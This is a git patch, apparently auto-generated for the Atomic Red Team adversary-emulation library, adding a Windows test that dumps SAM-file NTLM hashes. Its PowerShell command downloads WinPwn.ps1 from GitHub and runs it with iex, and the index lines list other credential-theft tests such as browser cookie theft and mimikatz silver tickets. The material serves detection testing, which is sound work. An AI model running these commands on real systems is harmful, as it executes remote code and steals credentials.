From 812f7dcbaac07b2059933db8eecebde8151a51fc Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Fri, 13 May 2022 01:56:04 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 11 +++++++
 atomics/T1003.002/T1003.002.md                | 32 +++++++++++++++++++
 6 files changed, 47 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 29121a05..9f0383a8 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -131,6 +131,7 @@ credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90
 credential-access,T1003.002,Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
+credential-access,T1003.002,Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
 credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 79b2b564..504e7e7b 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -94,6 +94,7 @@ credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90
 credential-access,T1003.002,Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
+credential-access,T1003.002,Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
 credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index a3e52c6c..97cc2d34 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -177,6 +177,7 @@
   - Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
   - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
   - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.002 Silver Ticket](../../T1558.002/T1558.002.md)
   - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 9d5104c8..243a9c97 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -132,6 +132,7 @@
   - Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
   - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
   - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
 - [T1558.002 Silver Ticket](../../T1558.002/T1558.002.md)
   - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 1d214799..254fc496 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -7100,6 +7100,17 @@ credential-access:
         cleanup_command: |
           $toremove = #{dump_path} + "\" + '#{dumped_hive}'
           rm $toremove -ErrorAction Ignore
+    - name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
+      auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
+      description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
+          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
+          -consoleoutput -noninteractive  "
+        name: powershell
   T1555.002:
     technique:
       object_marking_refs:
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 7f5572e5..f9ddff47 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -36,6 +36,8 @@ Notes:
 
 - [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
 
+- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
+
 
 <br/>
 
@@ -310,4 +312,34 @@ rm $toremove -ErrorAction Ignore
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
+Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+samfile -consoleoutput -noninteractive
+```
+
+
+
+
+
+
 <br/>